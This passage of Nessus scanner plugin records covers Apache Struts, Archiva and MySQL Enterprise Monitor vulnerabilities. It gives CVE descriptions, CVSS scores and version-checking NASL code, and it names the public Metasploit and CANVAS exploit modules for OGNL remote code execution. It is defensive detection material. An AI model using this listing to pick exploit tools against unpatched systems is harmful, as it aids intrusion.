validation error exists related to unspecified scripts and unspecified parameters that could allow cross-site scripting attacks.\n (CVE-2013-2187)\n\n - Input validation errors exist related to the bundled version of Apache Struts that could allow arbitrary Object-Graph Navigation Language (OGNL) expression execution via specially crafted requests.\n (CVE-2013-2251)", "cvss3": {"score": null, "vector": null}, "published": "2014-04-29T00:00:00", "type": "nessus", "title": "Apache Archiva 
1.2.x <= 1.2.2 / 1.3.x <= 1.3.6 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2187", "CVE-2013-2251"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:archiva"], "id": "ARCHIVA_1_3_8.NASL", "href": "https://www.tenable.com/plugins/nessus/73761", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73761);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-2187\", \"CVE-2013-2251\");\n script_bugtraq_id(61189, 66991, 66998);\n script_xref(name:\"EDB-ID\", value:\"27135\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n\n script_name(english:\"Apache Archiva 1.2.x <= 1.2.2 / 1.3.x <= 1.3.6 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts an application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the instance of Apache Archiva\nhosted on the remote web server is 1.2.x prior than or equal to 1.2.2\nor 1.3.x prior than or equal to 1.3.6 and thus is affected by the\nfollowing vulnerabilities :\n\n - An input validation error exists related to\n unspecified scripts and unspecified parameters that\n could allow cross-site scripting attacks.\n (CVE-2013-2187)\n\n - Input validation errors exist related to the bundled\n version of Apache Struts that could allow arbitrary\n Object-Graph Navigation Language (OGNL) expression\n execution via specially crafted requests.\n (CVE-2013-2251)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://archiva.apache.org/security.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://commons.apache.org/proper/commons-ognl/\");\n 
script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Archiva 1.3.8 / 2.0.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-2251\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts DefaultActionMapper < 2.3.15.1 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/07/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:archiva\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"archiva_detect.nasl\");\n script_require_keys(\"www/archiva\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 8080);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:8080, embedded:FALSE);\n\ninstall = get_install_from_kb(appname:'archiva', port:port, exit_on_fail:TRUE);\ndir = install['dir'];\ninstall_url = build_url(port:port, qs:dir+'/index.action');\nversion = install['ver'];\n\nif (version == UNKNOWN_VER) audit(AUDIT_UNKNOWN_WEB_APP_VER, \"Apache Archiva\", install_url);\n\nif (version !~ \"^1\\.[23]($|\\.)\") audit(AUDIT_WEB_APP_NOT_INST, \"Apache Archiva 1.2.x / 1.3.x\", port);\n\n# Affected (per NVD) :\n# 1.2.x <= 1.2.2\n# 1.3.x <= 1.3.6\n# Fixed (per vendor) :\n# 1.3.8\n# 2.0.1\nif (\n version =~ \"^1\\.2($|[^0-9.])\" ||\n version =~ \"^1\\.2\\.[012]($|[^0-9])\" ||\n version =~ \"^1\\.3($|[^0-9.])\" ||\n version =~ \"^1\\.3\\.[0-6]($|[^0-9])\"\n)\n{\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 1.3.8 / 2.0.1' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, \"Apache Archiva\", install_url, version);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-29T15:48:34", "description": "According to its self-reported version, the MySQL Enterprise Monitor running on the remote host is affected by the multiple vulnerabilities in the bundled version of Apache Struts :\n\n - Input validation errors exist that allows the execution of arbitrary Object-Graph Navigation Language (OGNL) expressions via specially crafted parameters to the DefaultActionMapper. 
(CVE-2013-2251)\n\n - Multiple unspecified vulnerabilities exist related to dynamic method invocation being enabled by default.\n (CVE-2013-4316)", "cvss3": {"score": null, "vector": null}, "published": "2015-05-08T00:00:00", "type": "nessus", "title": "MySQL Enterprise Monitor < 2.3.14 Apache Struts Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2251", "CVE-2013-4316"], "modified": "2022-03-28T00:00:00", "cpe": ["cpe:/a:mysql:enterprise_monitor", "cpe:/a:apache:struts"], "id": "MYSQL_ENTERPRISE_MONITOR_2_3_14.NASL", "href": "https://www.tenable.com/plugins/nessus/83292", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83292);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/28\");\n\n script_cve_id(\"CVE-2013-2251\", \"CVE-2013-4316\");\n script_bugtraq_id(61189, 62587);\n script_xref(name:\"EDB-ID\", value:\"27135\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n\n script_name(english:\"MySQL Enterprise Monitor < 2.3.14 Apache Struts Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the MySQL Enterprise Monitor\nrunning on the remote host is affected by the multiple vulnerabilities\nin the bundled version of Apache Struts :\n\n - Input validation errors exist that allows the execution\n of arbitrary Object-Graph Navigation Language (OGNL)\n expressions via specially crafted parameters to the\n DefaultActionMapper. 
(CVE-2013-2251)\n\n - Multiple unspecified vulnerabilities exist related to\n dynamic method invocation being enabled by default.\n (CVE-2013-4316)\");\n # http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?17c46362\");\n # http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ac29c174\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-016.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-019.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MySQL Enterprise Monitor 2.3.14 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-4316\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts DefaultActionMapper < 2.3.15.1 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/07/16\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2013/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mysql:enterprise_monitor\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_enterprise_monitor_web_detect.nasl\");\n script_require_keys(\"installed_sw/MySQL Enterprise Monitor\");\n script_require_ports(\"Services/www\", 18080);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"MySQL Enterprise Monitor\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nfix = \"2.3.14\";\nport = get_http_port(default:18080);\n\ninstall = get_single_install(app_name:app, port:port, exit_if_unknown_ver:TRUE);\nversion = install['version'];\ninstall_url = build_url(port:port, qs:\"/\");\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T16:59:15", "description": "The version of Apache Struts running on the remote host is 2.x prior to 2.3.15.1. 
It, therefore, is affected by multiple vulnerabilities including a remote command execution vulnerability and an open redirect vulnerability.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-09-10T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.3.15.1 Multiple Vulnerabilities (S2-016) (S2-017)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2248", "CVE-2013-2251"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_15_1.NASL", "href": "https://www.tenable.com/plugins/nessus/117362", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117362);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-2248\", \"CVE-2013-2251\");\n script_bugtraq_id(61189, 61196);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n\n script_name(english:\"Apache Struts 2.x < 2.3.15.1 Multiple Vulnerabilities (S2-016) (S2-017)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework\nthat is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.x\nprior to 2.3.15.1. 
It, therefore, is affected by multiple\nvulnerabilities including a remote command execution vulnerability\nand an open redirect vulnerability.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-016\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-017\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.15.1 or later\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-2251\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts DefaultActionMapper < 2.3.15.1 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/07/09\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2013/07/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.0.0\", \"max_version\" : \"2.3.15\", \"fixed_version\" : \"2.3.15.1\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T16:59:14", "description": "The version of Apache Struts running on the remote host is 2.x prior to 2.3.4.1. 
It, therefore, is affected by multiple vulnerabilities including a Denial of Service (DoS) and cross-site request forgery (XSRF) vulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.1, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"}, "published": "2018-09-11T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.3.4.1 Multiple Vulnerabilities (S2-010) (S2-011)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-4386", "CVE-2012-4387"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_4_1.NASL", "href": "https://www.tenable.com/plugins/nessus/117400", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117400);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2012-4386\", \"CVE-2012-4387\");\n script_bugtraq_id(54346, 55346);\n\n script_name(english:\"Apache Struts 2.x < 2.3.4.1 Multiple Vulnerabilities (S2-010) (S2-011)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework\nthat is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.x\nprior to 2.3.4.1. 
It, therefore, is affected by multiple\nvulnerabilities including a Denial of Service (DoS) and cross-site\nrequest forgery (XSRF) vulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-010\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-011\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.4.1 or later\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-4386\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/08/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/08/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.0.0\", \"max_version\" : \"2.3.4\", \"fixed_version\" : \"2.3.4.1\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING, flags:{xsrf:TRUE});\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:37:48", "description": "The version of Apache Struts running on the remote Windows host is 2.x prior to 2.3.29. It is, therefore, affected by the following vulnerabilities :\n\n - A remote code execution vulnerability exists due to erroneously performing double OGNL evaluation of attribute values assigned to certain tags. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to execute arbitrary code.\n (CVE-2016-0785)\n\n - A cross-site request forgery (XSRF) vulnerability exists due to improper validation of session tokens. An unauthenticated, remote attacker can exploit this, via a malicious OGNL expression, to bypass token validation and perform an XSRF attack. (CVE-2016-4430)\n\n - Multiple input validation issues exists that allow internal security mechanisms to be bypassed, allowing the manipulation of a return string which can be used to redirect users to a malicious website. This affects both the default action method the 'getter' action method.\n (CVE-2016-4431, CVE-2016-4433)\n\n - An unspecified flaw exists that is triggered during the cleanup of action names. 
An unauthenticated, remote attacker can exploit this, via a specially crafted payload, to perform unspecified actions. (CVE-2016-4436)\n\n - A remote code execution vulnerability exists in the REST plugin due to improper handling of OGNL expressions. An unauthenticated, remote attacker can exploit this, via a specially crafted OGNL expression, to execute arbitrary code. (CVE-2016-4438)\n\n - A remote code execution vulnerability exists in user tag attributes due to improper handling of OGNL expressions. An unauthenticated, remote attacker can exploit this, via a specially crafted double OGNL evaluation, to execute arbitrary code. (CVE-2016-4461)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-06-24T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.3.29 Multiple Vulnerabilities (S2-035 - S2-040)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0785", "CVE-2016-4430", "CVE-2016-4431", "CVE-2016-4433", "CVE-2016-4436", "CVE-2016-4438", "CVE-2016-4461"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_29_WIN_LOCAL.NASL", "href": "https://www.tenable.com/plugins/nessus/91812", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91812);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2016-0785\",\n \"CVE-2016-4430\",\n \"CVE-2016-4431\",\n \"CVE-2016-4433\",\n \"CVE-2016-4436\",\n \"CVE-2016-4438\",\n \"CVE-2016-4461\"\n );\n script_bugtraq_id(\n 85066,\n 91275,\n 91277,\n 91280,\n 91281,\n 91282,\n 91284\n );\n\n script_name(english:\"Apache Struts 2.x < 2.3.29 Multiple Vulnerabilities (S2-035 - 
S2-040)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a web application that uses a Java\nframework that is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote Windows host is 2.x\nprior to 2.3.29. It is, therefore, affected by the following\nvulnerabilities :\n\n - A remote code execution vulnerability exists due to\n erroneously performing double OGNL evaluation of\n attribute values assigned to certain tags. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted request, to execute arbitrary code.\n (CVE-2016-0785)\n\n - A cross-site request forgery (XSRF) vulnerability exists\n due to improper validation of session tokens. An\n unauthenticated, remote attacker can exploit this, via a\n malicious OGNL expression, to bypass token validation\n and perform an XSRF attack. (CVE-2016-4430)\n\n - Multiple input validation issues exists that allow\n internal security mechanisms to be bypassed, allowing\n the manipulation of a return string which can be used to\n redirect users to a malicious website. This affects both\n the default action method the 'getter' action method.\n (CVE-2016-4431, CVE-2016-4433)\n\n - An unspecified flaw exists that is triggered during the\n cleanup of action names. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n payload, to perform unspecified actions. (CVE-2016-4436)\n\n - A remote code execution vulnerability exists in the REST\n plugin due to improper handling of OGNL expressions. An\n unauthenticated, remote attacker can exploit this, via\n a specially crafted OGNL expression, to execute\n arbitrary code. (CVE-2016-4438)\n\n - A remote code execution vulnerability exists in user tag\n attributes due to improper handling of OGNL expressions. 
\n An unauthenticated, remote attacker can exploit this, \n via a specially crafted double OGNL evaluation, to \n execute arbitrary code. (CVE-2016-4461)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-035.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-036.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-037.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-038.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-039.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-040.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/version-notes-2329.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.29 or later. 
Alternatively,\napply the workarounds referenced in the vendor advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-4461\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts REST Plugin OGNL Expression Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\n\napp_info = vcf::combined_get_app_info(app:'Apache Struts');\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { 'min_version' : '2.0.0', 'max_version' : '2.3.28.1', 'fixed_display' : '2.3.29' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, flags:{xsrf:TRUE});\n\n", "cvss": {"score": 9, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:48:36", "description": "The remote host is affected by the vulnerability described in GLSA-201409-04 (MySQL: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in MySQL. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A local attacker could possibly gain escalated privileges. A remote attacker could send a specially crafted SQL query, possibly resulting in a Denial of Service condition. 
#### Related advisories (Nessus plugins)

GLSA-201409-04 : MySQL: Multiple vulnerabilities. Nessus scanner plugin 77548 ([tenable.com/plugins/nessus/77548](<https://www.tenable.com/plugins/nessus/77548>)), published 2014-09-05, last modified 2021-01-06. CPE: p-cpe:/a:gentoo:linux:mysql, cpe:/o:gentoo:linux. CVSS v2 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C); no CVSS v3 score. This MySQL advisory is related to the Struts discussion only through its CVE list, which includes the Struts 2 identifier CVE-2013-2134.

CVEs: CVE-2013-1861, CVE-2013-2134, CVE-2013-3839, CVE-2013-5767, CVE-2013-5770, CVE-2013-5786, CVE-2013-5793, CVE-2013-5807, CVE-2013-5860, CVE-2013-5881, CVE-2013-5882, CVE-2013-5891, CVE-2013-5894, CVE-2013-5908, CVE-2014-0001, CVE-2014-0384, CVE-2014-0386, CVE-2014-0393, CVE-2014-0401, CVE-2014-0402, CVE-2014-0412, CVE-2014-0420, CVE-2014-0427, CVE-2014-0430, CVE-2014-0431, CVE-2014-0433, CVE-2014-0437, CVE-2014-2419, CVE-2014-2430, CVE-2014-2431, CVE-2014-2432, CVE-2014-2434, CVE-2014-2435, CVE-2014-2436, CVE-2014-2438, CVE-2014-2440.

